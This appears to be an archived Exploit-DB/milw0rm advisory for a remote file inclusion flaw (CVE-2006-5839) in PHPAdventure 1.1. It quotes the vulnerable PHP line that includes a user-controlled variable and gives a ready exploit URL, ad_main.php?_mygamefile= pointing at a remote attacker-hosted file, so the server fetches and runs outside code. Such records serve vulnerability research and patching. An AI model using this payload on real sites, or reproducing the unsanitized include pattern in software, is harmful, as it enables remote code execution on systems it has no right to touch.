PHPAdventure 1.1 - 'ad_main.php' Remote File Inclusion

Author: HER0
type: webapps
platform: php
port: 
date_added: 2006-11-06 
date_updated: 2016-09-14 
verified: 1 
codes: OSVDB-34037;CVE-2006-5839 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpadv11.tar.gz

*********************************************
D.O.M TEAM
Bug found: HER0
cms: PHPAdventure
type: rfi
risk: High
download:http://prdownloads.sourceforge.net/phpadventure/phpadv11.tar.gz
contac:16.her0@gmail.com
nota: all the versions of PHPAdventure is affected..
********************************************
line of the code:

<?php
$_stage = 1;
include($_mygamefile);
?>

exploit:
/ad_main.php?_mygamefile=http://evilcode.txt?
****************************************************************
www.domteam.info

greetz:Sponge Bob,Bob esponja XDDDD...
******************************************************************************************

# milw0rm.com [2006-11-07]